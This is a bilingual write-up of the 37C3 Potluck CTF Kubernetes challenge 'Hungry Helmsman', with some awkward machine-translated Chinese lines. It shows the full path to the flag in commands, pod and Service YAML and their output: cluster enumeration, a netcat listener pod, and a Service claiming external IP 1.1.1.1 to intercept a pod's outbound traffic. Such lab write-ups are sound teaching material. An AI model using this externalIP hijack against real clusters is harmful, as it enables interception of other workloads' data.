Hungry Helmsman is a challenge I had the opportunity to solve during the CTF 2023 Potluck, which took place during the 37th Chaos Communication Congress. It’s a Kubernetes challenge in which we’re initially given a configuration with credentials. Thanks to these credentials, we can deploy a malicious pod to exploit poor partitioning between namespaces and retrieve the flag.
饥饿的舵手是我在第 37 届混沌通信大会期间举行的 CTF 2023 Potluck 期间有机会解决的一个挑战。这是一个 Kubernetes 挑战,我们最初会得到一个带有凭据的配置。多亏了这些凭据,我们可以部署一个恶意 pod 来利用命名空间之间的不良分区并检索标志。
Resolution : 分辨率:
To retrieve the configuration, you must first connect to a server :
要检索配置,必须首先连接到服务器:
rayanlecat@potluck2023 /workspace # nc challenge10.play.potluckctf.com 8888
_ _ _ _ __
| | | | | | | | / _|
_ __ ___ | |_| |_ _ ___| | _____| |_| |_
| '_ \ / _ \| __| | | | |/ __| |/ / __| __| _|
| |_) | (_) | |_| | |_| | (__| < (__| |_| |
| .__/ \___/ \__|_|\__,_|\___|_|\_\___|\__|_|
| |
|_|
Challenge: Hungry Helmsman
Creating Cluster
Waiting for control plane..........................................
Here is your Kubeconfig:
apiVersion: v1
clusters:
- cluster:
server: https://flux-cluster-74ca68cd8370436984e2dd80c3601e28.challenge10.play.potluckctf.com
name: ctf-cluster
contexts:
- context:
cluster: ctf-cluster
user: ctf-player
name: ctf-cluster
current-context: ctf-cluster
kind: Config
preferences: {}
users:
- name: ctf-player
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6Ild6S0RQYTNfQWpsV1BtRnIyZmo1NS1SZEJST1lnM2JqYWRScF9PQWhwdjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzAzODU2NDc2LCJpYXQiOjE3MDM4NTI4NzYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImN0Zi1wbGF5ZXIiLCJ1aWQiOiJmMjY1NTE3Yy1jZjM1LTQwNzAtYTkwOS0zYWI4NjNmNWJlMjIifX0sIm5iZiI6MTcwMzg1Mjg3Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6Y3RmLXBsYXllciJ9.oTSHy_oVpwSfdOrOKCpsZgQgIRk1Fa-QdCoB3KqBRiX-WtQWgcgLlKGUbT4405CnDc60A4c79lkDjwQbX3s4EUT3Zw7CZSFrpcZM1VBwAzsK1eRTRafrSoTbeYt6vp_80jNVVNyEN2HpECyxQbguMmmU65tTvGupKQq_ZWjH0Z3NhRTIXbBgTVESFxjoMQNA4NRQ1AzHHUzqisVMUgIyKtvT00sZhwDLiqf0UNTHwDX56-j5tBNFIBB4gePB4S5PPiBt1ebGpR6GQXYtnTL3SLtLJNg_f-1Qyr3Hb_htGQGf90TekbtaHzC6jDfJzXl5JR6pYAcXWdZmpl8V4V2uUw
Once you have retrieved the kubernetes configuration, you can check that it has been loaded into kubectl :
检索 kubernetes 配置后,您可以检查它是否已加载到 kubectl 中:
rayanlecat@potluck2023 /workspace # # kubectl config --kubeconfig config view
apiVersion: v1
clusters:
- cluster:
server: https://flux-cluster-74ca68cd8370436984e2dd80c3601e28.challenge10.play.potluckctf.com
name: ctf-cluster
contexts:
- context:
cluster: ctf-cluster
user: ctf-player
name: ctf-cluster
current-context: ctf-cluster2
kind: Config
preferences: {}
users:
- name: ctf-player
user:
token: REDACTED
First, I’ll list the namespaces that exist in the kubernetes cluster:
首先,我将列出 kubernetes 集群中存在的命名空间:
rayanlecat@potluck2023 /workspace # kubectl get namespace
NAME STATUS AGE
default Active 99s
flag-reciever Active 93s
flag-sender Active 93s
kube-node-lease Active 99s
kube-public Active 99s
kube-system Active 99s
In the challenge cluster we see two interesting namespaces:
在质询集群中,我们看到两个有趣的命名空间:
– flag-reciever – 旗手
– flag-sender – 标志发送者
We’ll now list the resources present in these two namespaces, including the pods:
现在,我们将列出这两个命名空间中存在的资源,包括 Pod:
rayanlecat@potluck2023 /workspace # kubectl get pods --namespace=flag-sender
NAME READY STATUS RESTARTS AGE
flag-sender-676776d678-2g8vm 1/1 Running 0 8m12s
rayanlecat@potluck2023 /workspace # kubectl get pods --namespace=flag-reciever
No resources found in flag-reciever namespace.
There is a pod only in the flag-sender namespace, so we can retrieve information about this pod:
仅在 flag-sender 命名空间中有一个 pod,因此我们可以检索有关此 pod 的信息:
rayanlecat@potluck2023 /workspace # kubectl describe pods/flag-sender-676776d678-5s6t5 --namespace=flag-sender
Name: flag-sender-676776d678-5s6t5
Namespace: flag-sender
...[snip]...
Command:
sh
Args:
-c
while true; do echo $FLAG | nc 1.1.1.1 80 || continue; echo 'Flag Send'; sleep 10; done
...[snip]...
We can see that the pod makes a connection to port 80 of ip 1.1.1.1 (which is cloudflare’s DNS) every 10 seconds, sending the flag, but the problem is that we don’t have access to the machine in question and we don’t have access to the container running in this pod. The problem is how to impersonate or spoof the ip address 1.1.1.1 in order to retrieve the flag. To answer this question, we need to continue enumerating the cluster and our rights within it:
我们可以看到 pod 每 10 秒连接到 ip 1.1.1.1(即 cloudflare 的 DNS)的端口 80,发送标志,但问题是我们无权访问有问题的机器,也无权访问在此 pod 中运行的容器。问题是如何模拟或欺骗 IP 地址 1.1.1.1 以检索标志。为了回答这个问题,我们需要继续枚举集群和我们在其中的权限:
rayanlecat@potluck2023 /workspace # kubectl auth can-i --list --namespace=flag-reciever
Resources Non-Resource URLs Resource Names Verbs
pods.* [] [] [create delete]
services.* [] [] [create delete]
...[snip]...
As you can see, you can create pods and services in the flag-reciever namspace. Let’s try deploying a pod to check that it works properly:
如您所见,您可以在 flag-receiver-namspace 中创建 pod 和服务。让我们尝试部署一个 pod 来检查它是否正常工作:
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
namespace: flag-reciever
spec:
containers:
- name: evil-container
image: busybox
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
Error from server (Forbidden): error when creating "pod.yml": pods "evil-pod" is forbidden: violates PodSecurity "restricted:latest":
allowPrivilegeEscalation != false (container "evil-container" must set securityContext.allowPrivilegeEscalation=false),
unrestricted capabilities (container "evil-container" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "evil-container" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "evil-container" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
We have a first problem when we try to deploy a pod. The problem is that we’re violating the pod security policy, so we need to deploy a pod that respects these requirements:
当我们尝试部署 pod 时,我们遇到了第一个问题。问题在于我们违反了 pod 安全策略,因此我们需要部署一个符合以下要求的 pod:
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
namespace: flag-reciever
spec:
containers:
- name: evil-container
image: busybox
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
runAsUser: 1000
capabilities:
drop:
- ALL
seccompProfile:
type: RuntimeDefault
Now we have a second problem: when we deploy the pod we are told that our container does not respect the memory and cpu quotas:
现在我们有第二个问题:当我们部署 pod 时,我们被告知我们的容器不遵守内存和 cpu 配额:
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
Error from server (Forbidden): error when creating "pod.yml": pods "evil-pod" is forbidden: failed quota: flag-reciever: must specify limits.cpu for: evil-container; limits.memory for: evil-container; requests.cpu for: evil-container; requests.memory for: evil-container
First, we will retrieve the value of these quotas in order to modify the configuration of our pod:
首先,我们将检索这些配额的值,以便修改 Pod 的配置:
rayanlecat@potluck2023 /workspace # kubectl describe quota --namespace=flag-reciever
Name: flag-reciever
Namespace: flag-reciever
Resource Used Hard
-------- ---- ----
limits.cpu 0 200m
limits.memory 0 100M
requests.cpu 0 100m
requests.memory 0 50M
So we have just the characteristics of our container and we manage to deploy our pod:
因此,我们只有容器的特征,并设法部署我们的 pod:
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
namespace: flag-reciever
spec:
containers:
- name: evil-container
image: busybox
resources:
requests:
memory: "50M"
cpu: "50m"
limits:
memory: "100M"
cpu: "200m"
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
runAsUser: 1000
capabilities:
drop:
- ALL
seccompProfile:
type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
The question now is how to ensure that a pod in the flag-sender namespace can communicate with a pod in the flag-reciever namespace. To answer this question, let’s take a look at networkpolicies:
现在的问题是如何确保 flag-sender 命名空间中的 pod 可以与 flag-recipient 命名空间中的 pod 通信。为了回答这个问题,让我们看一下网络策略:
rayanlecat@potluck2023 /workspace # kubectl get networkpolicies --namespace=flag-reciever
NAME POD-SELECTOR AGE
flag-reciever <none> 17m
rayanlecat@potluck2023 /workspace # kubectl describe networkpolicies --namespace flag-reciever
Name: flag-reciever
Namespace: flag-reciever
Created on: 2023-12-29 15:50:55 +0100 CET
Labels: <none>
Annotations: <none>
Spec:
PodSelector: <none> (Allowing the specific traffic to all pods in this namespace)
Allowing ingress traffic:
To Port: <any> (traffic allowed to all ports)
From:
NamespaceSelector: ns=flag-sender
PodSelector: app=flag-sender
Allowing egress traffic:
<none> (Selected pods are isolated for egress connectivity)
Policy Types: Ingress, Egress
We can see that a rule has been set up to authorize all ingress traffic from the flag-sender application in the flag-sender namespace to all pods in the flag-reciever namespace, so normally if I manage to create a service with externalIP 1.1.1.1 that exposes port 80 on the container of a pod I control, I should be able to retrieve the flag. To do this, the first step is to open a listening port on a :
我们可以看到,已经设置了一个规则来授权从 flag-sender 命名空间中的 flag-sender 应用程序到 flag-reciever 命名空间中的所有 pod 的所有入口流量,因此通常,如果我设法创建一个具有 externalIP 1.1.1.1 的服务,该服务在 pod I 控制的容器上公开端口 80,我应该能够检索该标志。为此,第一步是在 :
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
namespace: flag-reciever
spec:
containers:
- name: evil-container
image: busybox
ports:
- containerPort: 80
args: ["sh", "-c", "while true; do nc -l -v -p 80; done"]
resources:
requests:
memory: "50M"
cpu: "50m"
limits:
memory: "100M"
cpu: "200m"
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
runAsUser: 1000
capabilities:
drop:
- ALL
seccompProfile:
type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
rayanlecat@potluck2023 /workspace # kubectl logs -f evil-pod --namespace=flag-reciever
nc: bind: Permission denied
The problem here is that when deploying our pod, we have to respect their security policy and therefore not launch our container as root, which means we can’t listen on port 80 as it’s a privileged port. To overcome this, we can listen on an unprivileged port:
这里的问题是,在部署我们的 pod 时,我们必须尊重他们的安全策略,因此不要以 root 身份启动我们的容器,这意味着我们不能监听端口 80,因为它是一个特权端口。为了克服这个问题,我们可以在非特权端口上进行监听:
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
namespace: flag-reciever
spec:
containers:
- name: evil-container
image: busybox
ports:
- containerPort: 1337
args: ["sh", "-c", "while true; do nc -l -v -p 1337; done"]
resources:
requests:
memory: "50M"
cpu: "50m"
limits:
memory: "100M"
cpu: "200m"
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
runAsUser: 1000
capabilities:
drop:
- ALL
seccompProfile:
type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
rayanlecat@potluck2023 /workspace # kubectl logs -f evil-pod --namespace=flag-reciever
listening on [::]:1337 ...
We can now see that we can start listening on port 1337, but we need to create the associated service that will expose our port on ip 1.1.1.1 and port 80 to retrieve the flag. However, don’t forget to label our pod as an application, otherwise we won’t be able to select it with our service (perhaps there’s a way of selecting a pod directly without labeling it, but I haven’t found one):
我们现在可以看到,我们可以开始侦听端口 1337,但我们需要创建关联的服务,该服务将在 ip 1.1.1.1 和端口 80 上公开我们的端口以检索标志。但是,不要忘记将我们的 pod 标记为应用程序,否则我们将无法使用我们的服务选择它(也许有一种方法可以直接选择 pod 而不标记它,但我还没有找到):
rayanlecat@potluck2023 /workspace # cat service.yml
apiVersion: v1
kind: Service
metadata:
name: evil-service
namespace: flag-reciever
spec:
selector:
app: evil-receiver
ports:
- protocol: TCP
port: 80
targetPort: 1337
externalIPs:
- 1.1.1.1
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
namespace: flag-reciever
labels:
app: evil-receiver
spec:
containers:
- name: evil-container
image: busybox
ports:
- containerPort: 1337
args: ["sh", "-c", "while true; do nc -l -v -p 1337; done"]
resources:
requests:
memory: "50M"
cpu: "50m"
limits:
memory: "100M"
cpu: "200m"
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
runAsUser: 1000
capabilities:
drop:
- ALL
seccompProfile:
type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
rayanlecat@potluck2023 /workspace # kubectl apply -f service.yml --namespace=flag-reciever
service/evil-service created
We’ve successfully deployed our pod and our service. And finally, when we look at our pod’s logs, we can see that we’ve received the flag :
我们已经成功部署了我们的 pod 和服务。最后,当我们查看 pod 的日志时,我们可以看到我们收到了以下标志:
rayanlecat@potluck2023 /workspace # kubectl logs -f evil-pod --namespace=flag-reciever
listening on [::]:1337 ...
connect to [::ffff:192.168.20.6]:1337 from (null) ([::ffff:192.168.20.0]:7004)
potluck{kubernetes_can_be_a_bit_weird}
Flag : 旗:potluck{kubernetes_can_be_a_bit_weird}
Conclusion : 结论:
I found the challenge rather pleasant, even if it wasn’t very hard. In the context of the CTF, which only lasted 24 hours, and with the mass of challenges there were alongside it, a little challenge like that is always a pleasure, especially when it’s a technology like kubernetes, which you don’t find very often in CTF.
我发现这个挑战相当愉快,即使它不是很困难。在 CTF 的背景下,它只持续了 24 小时,并且伴随着大量的挑战,像这样的小挑战总是令人愉快的,尤其是当它是像 Kubernetes 这样的技术时,你在 CTF 中并不常见。
I’d also like to congratulate Calle Svensson, who single-handedly organized the CTF and ensured it ran smoothly throughout the event.
我还要祝贺Calle Svensson,他一手组织了CTF,并确保了整个活动期间的顺利进行。
And of course, thanks to The Flat Network Society for allowing me to take part in the CTF with them, and to all those who were part of the team, it was really cool!
当然,感谢 The Flat Network Society 允许我和他们一起参加 CTF,感谢团队中的所有成员,这真的很酷!
Ressources : 资源 :
- https://www.synacktiv.com/en/publications/kubernetes-namespaces-isolation-what-it-is-what-it-isnt-life-universe-and-everything
- https://kubernetes.io/docs/reference/kubectl/
- https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/
- https://github.com/DataDog/KubeHound
原文始发于BOUYAICHE RAYAN:37C3 Potluck CTF – Hungry Helmsman